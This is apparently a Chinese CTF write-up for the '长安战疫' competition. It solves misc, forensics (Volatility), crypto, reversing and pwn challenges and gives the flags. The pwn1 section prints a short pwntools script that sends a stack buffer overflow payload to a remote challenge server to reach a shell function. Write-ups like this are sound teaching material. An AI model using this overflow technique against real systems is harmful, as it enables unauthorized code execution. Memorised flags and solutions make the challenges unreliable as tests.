长安战疫wp

misc

八卦迷宫

直接走迷宫

cazy{zhanchangyangchangzhanyanghechangshanshananzhanyiyizhanyianyichanganyang}

朴实无华的取证

先python2 vol.py -f /home/ltlly/桌面/xp_sp3.raw imageinfo

--profile=WinXPSP3x86

python2 vol.py -f /home/ltlly/桌面/xp_sp3.raw pslist>1.txt

看一眼进程 试探之后发现notepad内容是?

*** Failed to import volatility.plugins.malware.threads (NameError: name 'distorm3' is not defined)

*** Failed to import volatility.plugins.mac.apihooks_kernel (ImportError: No module named distorm3)

*** Failed to import volatility.plugins.mac.check_syscall_shadow (ImportError: No module named distorm3)

*** Failed to import volatility.plugins.ssdt (NameError: name 'distorm3' is not defined)

*** Failed to import volatility.plugins.mac.apihooks (ImportError: No module named distorm3)

Offset(V)  Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit

---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------

0x8214fa00 System                    4      0     56      364 ------      0

0x81cfe778 smss.exe                588      4      3       19 ------      0 2021-12-27 00:51:12 UTC+0000

0x81b39da0 csrss.exe               636    588     12      841      0      0 2021-12-27 00:51:13 UTC+0000

0x81ffb020 winlogon.exe            668    588     23      526      0      0 2021-12-27 00:51:13 UTC+0000

0x81b3bbf0 services.exe            712    668     15      308      0      0 2021-12-27 00:51:13 UTC+0000

0x81c80478 lsass.exe               724    668     21      360      0      0 2021-12-27 00:51:13 UTC+0000

0x81b27370 vmacthlp.exe            908    712      1       25      0      0 2021-12-27 00:51:13 UTC+0000

0x81b3da70 svchost.exe             924    712     17      205      0      0 2021-12-27 00:51:13 UTC+0000

0x82076b18 svchost.exe             988    712     10      296      0      0 2021-12-27 00:51:13 UTC+0000

0x81f228b8 svchost.exe            1084    712     72     1491      0      0 2021-12-27 00:51:13 UTC+0000

0x81b11450 svchost.exe            1176    712      6       93      0      0 2021-12-27 00:51:13 UTC+0000

0x81b4eda0 Pinyin_2345Svc.        1196    712     17      367      0      0 2021-12-27 00:51:13 UTC+0000

0x81b70be8 svchost.exe            1312    712      3      103      0      0 2021-12-27 00:51:14 UTC+0000

0x81f5b440 Protect_2345Exp        1324    712     11      335      0      0 2021-12-27 00:51:14 UTC+0000

0x81f06da0 Pic_2345Svc.exe        1368    712     26      432      0      0 2021-12-27 00:51:14 UTC+0000

0x81b1c620 ZhuDongFangYu.e        1508    712     19      235      0      0 2021-12-27 00:51:14 UTC+0000

0x81bae4b0 spoolsv.exe            1764    712     10      136      0      0 2021-12-27 00:51:14 UTC+0000

0x81b1eda0 explorer.exe           1904   1820     33      980      0      0 2021-12-27 00:51:14 UTC+0000

0x81bf7748 2345PinyinCloud        2016   1904     21      390      0      0 2021-12-27 00:51:15 UTC+0000

0x81b62c20 FaceTool_2345Pi         304   2016     12      230      0      0 2021-12-27 00:51:16 UTC+0000

0x81c1a020 360tray.exe             916   1904    158     1704      0      0 2021-12-27 00:51:18 UTC+0000

0x81bdd9b8 vmtoolsd.exe            944   1904     10      345      0      0 2021-12-27 00:51:18 UTC+0000

0x81c7cc80 ctfmon.exe              932   1904      6      180      0      0 2021-12-27 00:51:18 UTC+0000

0x81b5ada0 2345PinyinUpdat        1052   1196      0 --------      0      0 2021-12-27 00:51:18 UTC+0000   2021-12-27 00:58:08 UTC+0000

0x81d78770 TsBrowserSvr.ex        2856    712     12      217      0      0 2021-12-27 00:51:40 UTC+0000

0x81d29670 VGAuthService.e        2916    712      2       60      0      0 2021-12-27 00:51:40 UTC+0000

0x81c215c8 vmtoolsd.exe           3420    712      7      273      0      0 2021-12-27 00:51:52 UTC+0000

0x81f09750 alg.exe                3820    712      5      104      0      0 2021-12-27 00:51:53 UTC+0000

0x81a18768 wmiprvse.exe           3844    924     13      302      0      0 2021-12-27 00:51:53 UTC+0000

0x819ad580 360bdoctor.exe         2832    916      9      262      0      0 2021-12-27 01:02:55 UTC+0000

0x819a78f8 360seupdate.exe         440   2832      0 --------      0      0 2021-12-27 01:02:55 UTC+0000   2021-12-27 01:02:56 UTC+0000

0x819b45f8 sesvc.exe              3920   2832      0 --------      0      0 2021-12-27 01:02:56 UTC+0000   2021-12-27 01:02:56 UTC+0000

0x81c47308 svchost.exe            3488    712      5      128      0      0 2021-12-27 01:40:27 UTC+0000

0x81fd27e8 softupnotify.ex        2936    916      0 --------      0      0 2021-12-27 01:40:40 UTC+0000   2021-12-27 01:40:40 UTC+0000

0x819b0970 mspaint.exe            3888   1904      9      258      0      0 2021-12-27 01:44:37 UTC+0000

0x81a08da0 conime.exe             3260   2124      9      183      0      0 2021-12-27 01:44:47 UTC+0000

0x81d68a50 IEXPLORE.EXE           3748   1904     21      578      0      0 2021-12-27 01:44:52 UTC+0000

0x819d6a18 wdswfsafe.exe          2136    916      4       70      0      0 2021-12-27 01:44:52 UTC+0000

0x819c98a0 softupnotify.ex         884    916      0 --------      0      0 2021-12-27 01:44:52 UTC+0000   2021-12-27 01:44:52 UTC+0000

0x81c2b2f0 IEXPLORE.EXE           3976   3748     37     1374      0      0 2021-12-27 01:44:52 UTC+0000

0x819b23b0 softupnotify.ex        1916    916      0 --------      0      0 2021-12-27 02:00:18 UTC+0000   2021-12-27 02:00:18 UTC+0000

0x81c33630 softupnotify.ex         972    916      0 --------      0      0 2021-12-27 02:03:28 UTC+0000   2021-12-27 02:03:28 UTC+0000

0x81f2c7e0 notepad.exe            2976   1904      6      180      0      0 2021-12-27 02:27:06 UTC+0000

0x81c7f630 360zip.exe             3388   1904     10      366      0      0 2021-12-27 02:28:39 UTC+0000

0x81d4d020 2345PicViewer.e        3812   1904     23      378      0      0 2021-12-27 02:36:41 UTC+0000

0x81923020 taskmgr.exe            3628    668      9      188      0      0 2021-12-27 02:37:11 UTC+0000

0x81c30da0 DumpIt.exe             3300   1904      1       16      0      0 2021-12-27 02:37:38 UTC+0000                                 ```

python2 vol.py -f /home/ltlly/桌面/xp_sp3.raw filescan >file.txt

看看文件 搜flag

0x0000000001b34f90      1      1 R--r-- \Device\HarddiskVolume1\Documents and Settings\Administrator\桌面\flag.zip

0x0000000001e65028      1      0 R--rw- \Device\HarddiskVolume1\Documents and Settings\Administrator\桌面\flag.png

0x00000000017ad6a8      2      0 R--rw- \Device\HarddiskVolume1\Documents and Settings\Administrator\桌面\flag.zip

0x00000000018efcb8      1      0 RW-rw- \Device\HarddiskVolume1\Documents and Settings\Administrator\Recent\flag.lnk

直接都导出来

一个压缩包损坏 先不修

另一个压缩包直接跑 密码20211209

拿到一个加密脚本

void Encrypt(string& str)

{

	for(int i = 0; i < str.length(); i++)

	{

		if(str[i] >='a'&& str[i]<='w')

			str[i]+=3;

		else if(str[i]=='x')

			str[i]='a';

		else if(str[i]=='y')

			str[i]='b';

		else if(str[i]=='z')

			str[i]='c';

		else if(str[i]=='_')

			str[i]='|';

		str[i] -= 32;

	}

}

a = "FDCB[8LDQ?ZL00?FHUWDLQ0B?VXFFHHG?LQ?ILJKWLQJ?WKH?HSLGHPLF]"

# for x in a:

#     print(chr(ord(x) + 32), end="")

a = "fdcb{Xldq_zlPP_fhuwdlqPb_vxffhhg_lq_iljkwlqj_wkh_hslghplf}"

for x in a:

    if x == 'a':

        print("x", end="")

    elif x == 'b':

        print("y", end="")

    elif x == 'c':

        print("z", end="")

    elif x == "|":

        print("_", end="")

    elif x.islower():

        print(chr(ord(x) - 3), end="")

    else:

        print(chr(ord(x)), end="")

cazy{Xian_wiPP_certainPy_succeed_in_fighting_the_epidemic}

不太对 小改一下

cazy{Xian_will_certainly_succeed_in_fighting_the_epidemic}

无字天书

别找流量啦 开导!

binwalk-e 拿

hex转字符 是个压缩包

解压

key.ws是whitespace https://vii5ard.github.io/whitespace/

flag.txt是snow

西安加油

导出所有!

hint.txt base32解密

9403.png is 0

8086.png is 1

7301.png is 2

7422.png is 3

3978.png is 4

8266.png is 5

7683.png is 6

5410.png is 7

4365.png is 8

2426.png is 9

9056.png is 10

3205.png is 11

6361.png is 12

9167.png is 13

3195.png is 14

5852.png is 15

9280.png is 16

9702.png is 17

8424.png is 18

1675.png is 19

3014.png is 20

7986.png is 21

8432.png is 22

7139.png is 23

4655.png is 24

7258.png is 25

3565.png is 26

5444.png is 27

7384.png is 28

2003.png is 29

8688.png is 30

5956.png is 31

3509.png is 32

9027.png is 33

1905.png is 34

6085.png is 35

7406.png is 36

1650.png is 37

8602.png is 38

9377.png is 39

1323.png is 40

7321.png is 41

2747.png is 42

7125.png is 43

1220.png is 44

7079.png is 45

5172.png is 46

5070.png is 47

secret.txt是base64 解出来压缩包解压

然后 拼

binary

改后缀class ij打开

数组拿走

a=[77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 69, 119, 77, 84, 69, 120, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 65, 120, 77, 84, 69, 120, 77, 84, 69, 119, 77, 84, 69, 120, 77, 68, 65, 119, 77, 68, 65, 119, 77, 70, 120, 117, 77, 68, 69, 120, 77, 84, 69, 120, 77, 68, 69, 119, 77, 84, 69, 119, 77, 84, 65, 120, 77, 68, 69, 120, 77, 84, 69, 120, 77, 68, 65, 119, 77, 84, 69, 120, 77, 68, 69, 120, 77, 68, 69, 120, 77, 84, 69, 120, 77, 70, 120, 117, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 68, 65, 119, 77, 84, 69, 120, 77, 84, 65, 119, 77, 68, 69, 120, 77, 84, 65, 120, 77, 68, 69, 120, 77, 68, 69, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 69, 120, 77, 68, 65, 119, 77, 68, 65, 120, 77, 84, 65, 119, 77, 68, 69, 120, 77, 84, 65, 119, 77, 68, 65, 119, 77, 84, 65, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 69, 120, 77, 84, 65, 120, 77, 84, 65, 120, 77, 84, 65, 119, 77, 84, 69, 119, 77, 84, 69, 119, 77, 84, 65, 120, 77, 84, 69, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 69, 120, 77, 84, 69, 120, 77, 68, 69, 119, 77, 84, 69, 120, 77, 68, 69, 119, 77, 68, 65, 119, 77, 68, 65, 119, 77, 84, 65, 119, 77, 84, 65, 119, 77, 68, 65, 120, 77, 68, 69, 120, 77, 84, 69, 120, 77, 70, 120, 117, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 69, 119, 77, 84, 65, 120, 77, 68, 69, 119, 77, 84, 65, 120, 77, 68, 69, 119, 77, 84, 65, 120, 77, 68, 69, 119, 77, 84, 65, 120, 77, 68, 65, 119, 77, 68, 65, 119, 77, 70, 120, 117, 77, 84, 69, 120, 77, 84, 69, 120, 77, 84, 69, 119, 77, 68, 69, 119, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 69, 119, 77, 68, 69, 120, 77, 68, 65, 120, 77, 84, 69, 120, 77, 84, 69, 120, 77, 84, 69, 120, 77, 86, 120, 117, 77, 84, 69, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 84, 65, 120, 77, 68, 65, 119, 77, 68, 69, 119, 77, 84, 69, 120, 77, 84, 69, 120, 77, 68, 69, 119, 77, 68, 65, 119, 77, 68, 65, 120, 77, 84, 65, 119, 77, 70, 120, 117, 77, 68, 69, 119, 77, 84, 69, 119, 77, 84, 65, 119, 77, 68, 69, 120, 77, 68, 65, 120, 77, 68, 65, 120, 77, 68, 65, 119, 77, 68, 69, 119, 77, 68, 69, 120, 77, 68, 69, 119, 77, 84, 65, 120, 77, 84, 69, 119, 77, 86, 120, 117, 77, 84, 65, 120, 77, 84, 65, 119, 77, 68, 65, 119, 77, 84, 65, 119, 77, 84, 69, 120, 77, 84, 65, 119, 77, 84, 69, 119, 77, 68, 65, 120, 77, 84, 65, 120, 77, 68, 65, 119, 77, 68, 65, 120, 77, 68, 65, 120, 77, 70, 120, 117, 77, 84, 69, 120, 77, 68, 69, 120, 77, 84, 69, 120, 77, 84, 69, 120, 77, 68, 65, 120, 77, 68, 69, 119, 77, 84, 69, 119, 77, 84, 65, 119, 77, 68, 69, 120, 77, 68, 69, 119, 77, 84, 65, 120, 77, 84, 69, 119, 77, 70, 120, 117, 77, 84, 65, 120, 77, 68, 69, 120, 77, 68, 65, 119, 77, 84, 69, 120, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 69, 120, 77, 68, 69, 119, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 69, 120, 77, 68, 69, 119, 77, 84, 65, 119, 77, 84, 65, 119, 77, 68, 69, 119, 77, 68, 65, 120, 77, 84, 65, 120, 77, 84, 69, 119, 77, 84, 65, 120, 77, 84, 69, 119, 77, 84, 69, 120, 77, 84, 69, 119, 77, 86, 120, 117, 77, 68, 65, 120, 77, 68, 69, 119, 77, 68, 69, 119, 77, 68, 69, 120, 77, 84, 69, 120, 77, 84, 69, 119, 77, 84, 69, 120, 77, 68, 65, 119, 77, 68, 69, 120, 77, 68, 65, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 65, 120, 77, 68, 65, 119, 77, 84, 69, 119, 77, 84, 69, 120, 77, 68, 69, 120, 77, 68, 69, 120, 77, 68, 65, 120, 77, 84, 65, 119, 77, 84, 69, 119, 77, 68, 69, 120, 77, 68, 65, 120, 77, 84, 69, 119, 77, 86, 120, 117, 77, 84, 69, 120, 77, 68, 69, 119, 77, 68, 69, 120, 77, 68, 65, 119, 77, 84, 69, 120, 77, 84, 69, 120, 77, 84, 65, 120, 77, 84, 65, 120, 77, 68, 65, 120, 77, 84, 65, 119, 77, 68, 65, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 65, 119, 77, 68, 69, 120, 77, 84, 65, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 84, 69, 119, 77, 68, 65, 119, 77, 68, 69, 119, 77, 84, 69, 119, 77, 84, 69, 120, 77, 84, 69, 120, 77, 68, 69, 120, 77, 86, 120, 117, 77, 84, 69, 119, 77, 84, 69, 119, 77, 68, 69, 120, 77, 68, 69, 119, 77, 84, 69, 119, 77, 84, 65, 119, 77, 84, 69, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 68, 69, 120, 77, 68, 65, 119, 77, 68, 69, 119, 77, 70, 120, 117, 77, 68, 69, 119, 77, 84, 65, 119, 77, 84, 65, 119, 77, 84, 69, 120, 77, 84, 65, 119, 77, 84, 65, 119, 77, 68, 65, 119, 77, 84, 65, 119, 77, 84, 69, 120, 77, 68, 65, 120, 77, 68, 65, 120, 77, 68, 69, 120, 77, 86, 120, 117, 77, 68, 69, 119, 77, 84, 65, 120, 77, 68, 65, 120, 77, 84, 65, 119, 77, 68, 69, 120, 77, 84, 65, 119, 77, 68, 69, 120, 77, 68, 65, 120, 77, 68, 65, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 84, 65, 119, 77, 70, 120, 117, 77, 84, 65, 119, 77, 84, 69, 119, 77, 84, 69, 120, 77, 84, 69, 119, 77, 84, 69, 120, 77, 68, 69, 120, 77, 68, 65, 120, 77, 68, 65, 120, 77, 84, 69, 120, 77, 84, 69, 119, 77, 84, 65, 120, 77, 84, 69, 119, 77, 86, 120, 117, 77, 84, 69, 119, 77, 84, 69, 119, 77, 68, 65, 120, 77, 68, 69, 120, 77, 84, 65, 119, 77, 68, 65, 119, 77, 68, 69, 119, 77, 84, 69, 120, 77, 68, 69, 120, 77, 68, 65, 119, 77, 84, 65, 120, 77, 84, 65, 120, 77, 70, 120, 117, 77, 68, 65, 120, 77, 84, 65, 119, 77, 84, 65, 119, 77, 68, 69, 120, 77, 84, 69, 119, 77, 84, 69, 119, 77, 68, 65, 120, 77, 84, 69, 120, 77, 68, 69, 119, 77, 68, 69, 119, 77, 68, 69, 120, 77, 84, 69, 119, 77, 86, 120, 117, 77, 68, 69, 119, 77, 84, 65, 119, 77, 68, 65, 119, 77, 84, 69, 120, 77, 68, 69, 119, 77, 84, 69, 120, 77, 68, 69, 120, 77, 68, 69, 119, 77, 84, 69, 120, 77, 84, 69, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 69, 119, 77, 84, 65, 120, 77, 84, 65, 120, 77, 84, 65, 119, 77, 84, 65, 119, 77, 84, 65, 119, 77, 68, 65, 119, 77, 68, 69, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 65, 120, 77, 84, 69, 120, 77, 86, 120, 117, 77, 68, 69, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 65, 119, 77, 84, 69, 120, 77, 68, 65, 120, 77, 68, 69, 120, 77, 68, 65, 120, 77, 84, 65, 120, 77, 84, 69, 120, 77, 84, 65, 119, 77, 84, 69, 119, 77, 70, 120, 117, 77, 68, 69, 120, 77, 84, 65, 119, 77, 84, 69, 120, 77, 84, 69, 119, 77, 68, 65, 119, 77, 68, 65, 120, 77, 68, 69, 120, 77, 68, 69, 120, 77, 68, 69, 120, 77, 84, 65, 119, 77, 84, 69, 120, 77, 84, 69, 119, 77, 70, 120, 117, 77, 68, 69, 119, 77, 68, 69, 120, 77, 68, 65, 120, 77, 68, 69, 120, 77, 68, 65, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 69, 120, 77, 84, 65, 120, 77, 84, 65, 119, 77, 68, 65, 119, 77, 68, 65, 119, 77, 70, 120, 117, 77, 84, 69, 120, 77, 84, 69, 120, 77, 84, 69, 119, 77, 84, 65, 120, 77, 84, 65, 119, 77, 84, 69, 120, 77, 68, 65, 120, 77, 84, 69, 119, 77, 68, 69, 119, 77, 84, 65, 120, 77, 84, 69, 119, 77, 84, 65, 120, 77, 86, 120, 117, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 69, 120, 77, 84, 65, 119, 77, 68, 69, 120, 77, 84, 65, 120, 77, 84, 65, 120, 77, 68, 69, 120, 77, 68, 65, 119, 77, 84, 65, 120, 77, 68, 69, 119, 77, 68, 69, 119, 77, 70, 120, 117, 77, 68, 69, 120, 77, 84, 69, 120, 77, 68, 69, 120, 77, 84, 65, 119, 77, 84, 69, 119, 77, 84, 65, 120, 77, 68, 69, 120, 77, 68, 69, 119, 77, 84, 69, 119, 77, 68, 65, 120, 77, 84, 69, 119, 77, 84, 69, 120, 77, 86, 120, 117, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 68, 69, 120, 77, 68, 65, 119, 77, 68, 69, 120, 77, 68, 65, 120, 77, 84, 65, 120, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 84, 69, 120, 77, 84, 69, 119, 77, 84, 69, 119, 77, 68, 65, 120, 77, 84, 69, 120, 77, 84, 69, 120, 77, 84, 69, 120, 77, 68, 69, 119, 77, 68, 69, 120, 77, 86, 120, 117, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 84, 69, 119, 77, 84, 69, 120, 77, 84, 69, 120, 77, 84, 69, 119, 77, 68, 65, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 84, 65, 120, 77, 68, 69, 120, 77, 70, 120, 117, 77, 68, 69, 120, 77, 84, 69, 120, 77, 68, 69, 120, 77, 84, 69, 120, 77, 84, 65, 119, 77, 68, 69, 119, 77, 84, 69, 119, 77, 84, 65, 119, 77, 84, 69, 120, 77, 84, 65, 119, 77, 68, 69, 120, 77, 68, 69, 120, 77, 70, 120, 117, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 69, 120, 77, 84, 69, 120, 77, 84, 65, 120, 77, 84, 69, 120, 77, 68, 69, 120, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 69, 119, 77, 68, 65, 120, 77, 84, 65, 119, 77, 65, 61, 61]

for x in a:

    print(chr(x),end="")

出base64 解密拿到一堆01 还带换行符真贴心

from PIL import Image

x = 37

y = 37

im = Image.new('RGB', (x, y))

white = (255, 255, 255)

black = (0, 0, 0)

with open('新建文本文档 (2).txt') as f:

    for i in range(x):

        ff = f.readline()

        for j in range(y):

            if ff[j] == '1':

                im.putpixel((i, j), black)

            else:

                im.putpixel((i, j), white)

im.save("1.jpg")

画二维码扫描

flag{932b2c0070e4897ea7df0190dbf36ece}

crypto

只会一道怎么说

no_cry_no_can

from Cryptodome.Util.number import *

# from secret import flag, key

flag="cazy{aaaaaa}".encode()

key="bbbbb".encode()

assert len(key) <= 5

assert flag[:5] == b'cazy{'

def can_encrypt(flag, key):

    block_len = len(flag) // len(key) + 1

    new_key = key * block_len

    return bytes([i ^ j for i, j in zip(flag, new_key)])

c = can_encrypt(flag, key)

print(c)

# b'<pH\x86\x1a&"m\xce\x12\x00pm\x97U1uA\xcf\x0c:NP\xcf\x18~l'

很简单的加密

flag前面五位固定cazy{

key最多五位 flag和key逐位异或

所以先拿cazy{异或拿key

再返回来异或拿flag

from Cryptodome.Util.number import *

d = b'<pH\x86\x1a&"m\xce\x12\x00pm\x97U1uA\xcf\x0c:NP\xcf\x18~l'

for index in range(len(d)):

    print(hex((d[index] ^ b"cazy{"[index % 5])),end=",")

#拿走前五位

for index in range(len(d)):

    print(chr(d[index] ^ b"\x5f\x11\x32\xff\x61"[index % 5]), end="")

cazy{y3_1s_a_h4nds0me_b0y!}

RE!

combat_slogan

解压 拿走main.class ij打开

d="Jr_j11y_s1tug_g0_raq_g0_raq_pnml"

for x in d:

    if ord(x)>=ord('a') and  ord(x)<=ord('m'):

        print(chr(ord(x)+13),end="")

    elif ord(x)>=ord('A') and  ord(x)<=ord('M'):

        print(chr(ord(x)+13),end="")

    elif ord(x)>=ord('n') and  ord(x)<=ord('z'):

        print(chr(ord(x)-13),end="")

    elif ord(x)>=ord('N') and  ord(x)<=ord('Z'):

        print(chr(ord(x)-13),end="")

    else:

        print(x,end="")

We_w11l_f1ght_t0_end_t0_end_cazy

cute_dog

ida

一眼base64 Zmxh是fla

flag{Ch1na_yyds_cazy}

hellopy

pyc在线反编译'

反编译出来跑不了 手动看得了 交替运行的两个函数 一个^index 一个^后一位

从后往前加密 所以从前往后解密

a = [44, 100, 3, 50, 106, 90, 5, 102, 10, 112]

for index in range(len(a) - 1):

    if index % 2:

        a[index] = a[index] ^ index

    else:

        a[index] = a[index] ^ a[index + 1]

print(a)

for x in a:

    print(chr(x), end="")

He110_cazp

多异或最后一个 不想改脚本

所以是

He110_cazy

pwn

pwn1

from pwn import *

r = remote('113.201.14.253', 16088)

shell_addr = 0x8048540

buf_addr = int(r.recvuntil(b'\n', drop=True)[2:], 16)

payload = b'a' * (0x38 - 0x4)+ p32(buf_addr + 0x38+4)+ p32(shell_addr)

r.sendline(payload)

r.interactive()

最新文章

1. 巧妙地用二叉树完成算式计算算法<计算器，二叉树，C++，独辟蹊径>
2. Nginx-Lua重定向系列
3. Oracle中instr 函数的详解
4. ButterKnife的简单使用
5. hdu 1029
6. Excel2007条件格式怎么用
7. [转载]面向对象设计（OOD）思想（C#）
8. [转载]Winform等待窗口的实现（附源代码）
9. 使用pager进行分页
10. Ubuntu 挂载硬盘分区
11. android wear开发之：创建可穿戴设备应用 - Creating Wearable Apps
12. Java第一个程序之HelloWorld
13. Flask block继承和include包含
14. oracle 导入execl
15. postgresql数据库安装及简单操作
16. Linux内核分析 笔记七 可执行程序的装载 ——by王玥
17. webpack报错：Module build failed (from ./node_modules/babel-loader/lib/index.js): Error: Cannot find module 'babel-preset-env' from '...' - Did you mean "@babel/env"?
18. KMeans (K均值)算法讲解及实现
19. docker unbuntu 32-bit 更新apt-get
20. JVM启动流程

热门文章

1. Flask_安装和配置（一）
2. Centos7 用户权限相关
3. Python常用功能函数系列总结（一）
4. Webstorm安装与配置
5. testng 的常用注解
6. 最完整的springboot2.2.x.RELEASE整合springDataElasticsearch 7.6.2
7. STM32 EXTI（外部中断）
8. [.Net]使用ABP 数据库迁移migration遇到的坑及解决方案
9. 《剑指offer》面试题41. 数据流中的中位数
10. INFO client.RMProxy: Connecting to ResourceManager at hadoop